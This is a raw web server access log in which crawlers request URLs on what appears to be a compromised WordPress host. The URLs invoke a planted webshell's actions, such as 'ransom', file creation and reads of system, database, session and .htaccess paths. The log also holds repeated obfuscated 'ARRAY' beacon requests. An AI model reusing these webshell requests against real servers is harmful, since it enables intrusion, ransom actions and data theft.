20.171.207.239 - - [17/Jun/2025:09:08:30 -0400] "GET /?aksi=ransom&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fmodules%2F4.18.0-553.lve.el8.x86_64%2Fweak-updates HTTP/1.1" 200 2486 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:08:32 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython3.6%2F__pycache__%2F_compression.cpython-36.opt-1.pyc&path=%2F%2Flib64%2Fpython3.6%2F__pycache__ HTTP/1.1" 301 4182 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:08:32 -0400] "GET /memory168035773.html?path=%2F HTTP/1.1" 301 2718 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:08:35 -0400] "GET /?aksi=ransom&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Ffirmware%2F4.18.0-553.lve.el8.x86_64%2Fintel-ucode HTTP/1.1" 301 2194 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:08:35 -0400] "GET / HTTP/1.1" 200 3715 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:08:39 -0400] "GET /comedy023048792.html?path=%2F HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:08:36 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython3.8%2F__pycache__%2Ftraceback.cpython-38.opt-2.pyc&path=%2F%2Flib64%2Fpython3.8%2F__pycache__ HTTP/1.1" 301 7477 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.222.190.107 - - [17/Jun/2025:09:08:36 -0400] "GET /?aksi=buatfolder&path=//lib/systemd HTTP/1.1" 200 20064 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:08:39 -0400] "GET /?aksi=buatfolder&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fmodules%2F4.18.0-553.lve.el8.x86_64%2Fweak-updates%2Flve-2.1-44.el8 HTTP/1.1" 200 2162 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:08:42 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython3.8%2F__pycache__%2Fplatform.cpython-38.opt-2.pyc&path=%2F%2Flib64%2Fpython3.8%2F__pycache__ HTTP/1.1" 200 10809 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:08:44 -0400] "GET /?aksi=buatfile&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fmodules%2F4.18.0-553.lve.el8.x86_64%2Fweak-updates%2Flve-2.1-44.el8 HTTP/1.1" 301 2528 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:08:47 -0400] "GET /winter205041138.html?path=%2F HTTP/1.1" 200 2738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:08:49 -0400] "GET /?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fwidgets-on-pages%2Ffreemius%2Ftemplates%2Fpartials HTTP/1.1" 200 2635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:08:47 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython3.6%2F__pycache__%2Fformatter.cpython-36.opt-1.pyc&path=%2F%2Flib64%2Fpython3.6%2F__pycache__ HTTP/1.1" 200 8200 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.196.118.6 - - [17/Jun/2025:09:08:48 -0400] "GET /?filesrc=//lib/firmware/libertas/cf8381_helper.bin&path=//lib/firmware/libertas HTTP/1.1" 200 21451 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
23.22.59.87 - - [17/Jun/2025:09:08:44 -0400] "GET /?filesrc=//lib/firmware/i915/skl_guc_33.0.0.bin&path=//lib/firmware/i915 HTTP/1.1" 200 97996 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
162.0.232.193 - - [17/Jun/2025:09:07:13 -0400] "GET /522314/522314/522314/index.php?ARRAY=7o2230223n313735303136393233332p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313735303136353633332q3138363263303266643162633261363064633539633735623334396433613132222p2232223n226632663636663265636461663061663634386464633866633363363830316337222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34362q35392q36372q38302q38382q3232227q HTTP/1.1" 200 0 "-" "-"
20.171.207.165 - - [17/Jun/2025:09:08:53 -0400] "GET /foster028013487.html?path=%2F HTTP/1.1" 301 2718 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:08:53 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython3.6%2F__pycache__%2Fdummy_threading.cpython-36.opt-1.pyc&path=%2F%2Flib64%2Fpython3.6%2F__pycache__ HTTP/1.1" 200 2739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.179.27 - - [17/Jun/2025:09:08:52 -0400] "GET /?path=//var/lib/mysql/oapwhxkz_wp927 HTTP/1.1" 200 20186 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:08:54 -0400] "GET /?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fwidgets-on-pages%2Ffreemius%2Fincludes%2Fsupplements HTTP/1.1" 200 2715 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:08:54 -0400] "GET / HTTP/1.1" 200 3703 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.195.50.71 - - [17/Jun/2025:09:08:56 -0400] "GET /?filesrc=//lib/firmware/ene-ub6250/sd_rdwr.bin&path=//lib/firmware/ene-ub6250 HTTP/1.1" 200 20754 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.165 - - [17/Jun/2025:09:08:59 -0400] "GET /refuge058036707.html?path=%2F HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:08:57 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython3.6%2F__pycache__%2Ffunctools.cpython-36.opt-1.pyc&path=%2F%2Flib64%2Fpython3.6%2F__pycache__ HTTP/1.1" 200 12323 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:08:58 -0400] "GET /?path=%2F%2Fproc%2Fself%2Froot%2Fopt%2Falt%2Ftests%2Falt-php80-pecl-mongodb_1.18.1-1.el8 HTTP/1.1" 200 2483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:09:01 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython3.6%2F__pycache__%2Fsocketserver.cpython-36.opt-2.pyc&path=%2F%2Flib64%2Fpython3.6%2F__pycache__ HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:09:02 -0400] "GET /?path=%2F%2Fproc%2Fself%2Froot%2Fopt%2Falt%2Ftests%2Falt-php83-pecl-mongodb_1.18.1-1.el8 HTTP/1.1" 200 2483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:09:04 -0400] "GET /vs183019758.html?path=%2Fhome HTTP/1.1" 200 2380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:09:05 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython3.6%2F__pycache__%2F_threading_local.cpython-36.opt-1.pyc&path=%2F%2Flib64%2Fpython3.6%2F__pycache__ HTTP/1.1" 301 4957 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:09:08 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython3.6%2F__pycache__%2Fipaddress.cpython-36.opt-1.pyc&path=%2F%2Flib64%2Fpython3.6%2F__pycache__ HTTP/1.1" 200 21657 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.83.72.38 - - [17/Jun/2025:09:09:12 -0400] "GET /?filesrc=//lib64/python3.6/sqlite3/dump.py&path=//lib64/python3.6/sqlite3 HTTP/1.1" 200 21302 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
54.235.158.162 - - [17/Jun/2025:09:09:28 -0400] "GET /?path=//usr/share/locale/bad HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.225 - - [17/Jun/2025:09:09:31 -0400] "GET /bothersome/shopbrand/zy1460040112.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Freadme.html&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 301 5038 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.225 - - [17/Jun/2025:09:09:40 -0400] "GET /creeper/shopdetail/sqe/1461067794.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content HTTP/1.1" 200 3135 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
54.145.82.217 - - [17/Jun/2025:09:09:32 -0400] "GET /?path=//var/lib/mysql/coolkndi_wp808 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:09:26 -0400] "GET /?path=%2F%2Fproc%2Firq%2F12 HTTP/1.1" 301 2678 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.193.102.198 - - [17/Jun/2025:09:09:36 -0400] "GET /?filesrc=//lib64/python2.7/filecmp.py&path=//lib64/python2.7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.225 - - [17/Jun/2025:09:09:42 -0400] "GET /treasuress/1456286536.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2F522314 HTTP/1.1" 200 2622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.225 - - [17/Jun/2025:09:09:47 -0400] "GET /sublimification/shopbrand/pry1462048196.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-includes HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.225 - - [17/Jun/2025:09:09:48 -0400] "GET /rhodian/item/aou/1463148798.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2F.htaccess&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 403 1242 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.165 - - [17/Jun/2025:09:09:30 -0400] "GET /beside287032354.html?path=%2F HTTP/1.1" 301 2718 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:09:48 -0400] "GET / HTTP/1.1" 200 3699 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.204.89.12 - - [17/Jun/2025:09:09:44 -0400] "GET /?path=//var/lib/mysql/pejufnin_wp561 HTTP/1.1" 200 20218 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:09:48 -0400] "GET /?path=%2F%2Fproc%2Firq%2F28 HTTP/1.1" 301 2686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:09:32 -0400] "GET /?filesrc=%2F%2Flib%2Frpm%2Fredhat%2Fconfig.sub&path=%2F%2Flib%2Frpm%2Fredhat HTTP/1.1" 200 12759 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:09:49 -0400] "GET /mouezzin/78301356.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Flicense.txt&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 301 9377 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
162.0.232.193 - - [17/Jun/2025:09:07:34 -0400] "GET /522314/522314/522314/index.php?ARRAY=7o2230223n313735303136393235342p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313735303136353635342q6665303336323164643863653430323664336563633464326162343630646136222p2232223n226632663636663265636461663061663634386464633866633363363830316337222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34362q35392q36372q38302q38382q3232227q HTTP/1.1" 200 0 "-" "-"
20.171.207.106 - - [17/Jun/2025:09:09:13 -0400] "GET /?filesrc=%2F%2Fusr%2Flib%2Fnode_modules%2Fnpm%2Fman%2Fman1%2FGET.1.gz&path=%2F%2Fusr%2Flib%2Fnode_modules%2Fnpm%2Fman%2Fman1 HTTP/1.1" 301 5224 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.226.89.140 - - [17/Jun/2025:09:09:16 -0400] "GET /?filesrc=//lib64/python3.6/sqlite3/dump.py&path=//lib64/python3.6/sqlite3 HTTP/1.1" 200 21278 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:09:05 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fvar%2Ftmp%2Fsess_0d5e1b38d8a4843128ddacb953e7565f&path=%2F%2Fproc%2Fself%2Froot%2Fvar%2Ftmp HTTP/1.1" 200 2038 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:09:19 -0400] "GET /dianthus/grc1466872266.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Ff5462e HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.165 - - [17/Jun/2025:09:09:10 -0400] "GET /future139030678.html?path=%2F HTTP/1.1" 200 2738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.215.231.15 - - [17/Jun/2025:09:09:20 -0400] "GET /?path=//usr/share/locale/gl HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:09:10 -0400] "GET /?filesrc=%2F%2Flib64%2Fapr-util-1%2Fapr_dbm_db-1.so&path=%2F%2Flib64%2Fapr-util-1 HTTP/1.1" 200 6050 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.225 - - [17/Jun/2025:09:09:21 -0400] "GET /culcitium/1459100904.shtml?path=%2Fhome HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
18.210.58.238 - - [17/Jun/2025:09:09:24 -0400] "GET /?filesrc=//lib/firmware/cirrus/cs35l41-dsp1-spk-prot-10280cc2-spkid0.bin&path=//lib/firmware/cirrus HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
162.0.232.193 - - [17/Jun/2025:09:07:56 -0400] "GET /522314/522314/522314/index.php?ARRAY=7o2230223n313735303136393237352p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313735303136353637352q6130356331303232396637653437313037363233383334313134643734356335222p2232223n226632663636663265636461663061663634386464633866633363363830316337222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34362q35392q36372q38302q38382q3232227q HTTP/1.1" 200 0 "-" "-"
20.171.207.165 - - [17/Jun/2025:09:09:50 -0400] "GET /saving126018425.html?path=%2F HTTP/1.1" 301 2720 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.232.39.98 - - [17/Jun/2025:09:09:52 -0400] "GET /?filesrc=//lib/firmware/cirrus/cs35l41-dsp1-spk-prot-104316f3.wmfw&path=//lib/firmware/cirrus HTTP/1.1" 200 37527 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.165 - - [17/Jun/2025:09:09:53 -0400] "GET / HTTP/1.1" 200 3691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.106 - - [17/Jun/2025:09:09:52 -0400] "GET /?filesrc=%2F%2Fusr%2Flib%2Fnode_modules%2Fnpm%2Fman%2Fman8%2FPAM.8.gz&path=%2F%2Fusr%2Flib%2Fnode_modules%2Fnpm%2Fman%2Fman8 HTTP/1.1" 200 4285 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:09:53 -0400] "GET /?aksi=buatfile&path=%2F%2Flib64%2Fpython3.6%2Fsite-packages%2Flibdnf HTTP/1.1" 200 3084 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
98.83.94.113 - - [17/Jun/2025:09:09:56 -0400] "GET /?path=//lib/NetworkManager/dispatcher.d/pre-up.d HTTP/1.1" 200 20193 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
3.226.106.93 - - [17/Jun/2025:09:10:04 -0400] "GET /?path=//usr/share/locale/zu HTTP/1.1" 200 20466 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:10:08 -0400] "GET /?path=%2F%2Fproc%2Firq%2F26 HTTP/1.1" 301 2686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:10:11 -0400] "GET /behind048039689.html?path=%2F HTTP/1.1" 200 2738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.22.64.232 - - [17/Jun/2025:09:10:12 -0400] "GET /?filesrc=//lib/locale/en_IE/LC_CTYPE&path=//lib/locale/en_IE HTTP/1.1" 200 51361 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:10:13 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Fcompileall.py&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 4476 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.225.243.131 - - [17/Jun/2025:09:10:16 -0400] "GET /?filesrc=//lib64/python3.6/asyncio/base_futures.py&path=//lib64/python3.6/asyncio HTTP/1.1" 200 20899 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.239 - - [17/Jun/2025:09:10:24 -0400] "GET /?path=%2F%2Fproc%2Firq%2F27 HTTP/1.1" 301 2693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
34.204.150.196 - - [17/Jun/2025:09:10:24 -0400] "GET /?filesrc=//lib/locale/en_SG/LC_MEASUREMENT&path=//lib/locale/en_SG HTTP/1.1" 200 20148 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.106 - - [17/Jun/2025:09:10:27 -0400] "GET /?filesrc=%2F%2Fusr%2Flib%2Fnode_modules%2Fnpm%2Fman%2Fman7%2FSET.7.gz&path=%2F%2Fusr%2Flib%2Fnode_modules%2Fnpm%2Fman%2Fman7 HTTP/1.1" 200 4882 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
162.0.232.193 - - [17/Jun/2025:09:08:16 -0400] "GET /522314/522314/522314/index.php?ARRAY=7o2230223n313735303136393239362p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313735303136353639362q3064333464326637643932383632313461643766653130333665353139323036222p2232223n226632663636663265636461663061663634386464633866633363363830316337222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34362q35392q36372q38302q38382q3232227q HTTP/1.1" 200 0 "-" "-"
162.0.232.193 - - [17/Jun/2025:09:08:39 -0400] "GET /522314/522314/522314/index.php?ARRAY=7o2230223n313735303136393331392p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313735303136353731392q6230333637346162306331616432643436396534383637336564366362383637222p2232223n226632663636663265636461663061663634386464633866633363363830316337222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34362q35392q36372q38302q38382q3232227q HTTP/1.1" 200 0 "-" "-"
162.0.232.193 - - [17/Jun/2025:09:09:00 -0400] "GET /522314/522314/522314/index.php?ARRAY=7o2230223n313735303136393334302p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313735303136353734302q6235646266623334363064613837646434323861383839613634636638663764222p2232223n226632663636663265636461663061663634386464633866633363363830316337222p2233223n226630633834306462643437326464376133373338326237636638383235333233222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232312q34362q35392q36372q38302q38382q3232227q HTTP/1.1" 200 0 "-" "-"
20.171.207.165 - - [17/Jun/2025:09:10:30 -0400] "GET /course285038732.html?path=%2F%2Frun HTTP/1.1" 200 2836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:10:32 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Flinecache.pyo&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 3799 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:10:40 -0400] "GET /?path=%2F%2Fproc%2Firq%2F25 HTTP/1.1" 200 2724 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.165 - - [17/Jun/2025:09:10:47 -0400] "GET /bridge080042437.html?path=%2F HTTP/1.1" 200 2738 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.239 - - [17/Jun/2025:09:10:49 -0400] "GET /?filesrc=%2F%2Flib64%2Fpython2.7%2Fformatter.pyo&path=%2F%2Flib64%2Fpython2.7 HTTP/1.1" 200 7589 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
54.197.178.107 - - [17/Jun/2025:09:10:52 -0400] "GET /?path=//lib/NetworkManager/dispatcher.d/no-wait.d HTTP/1.1" 200 20206 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
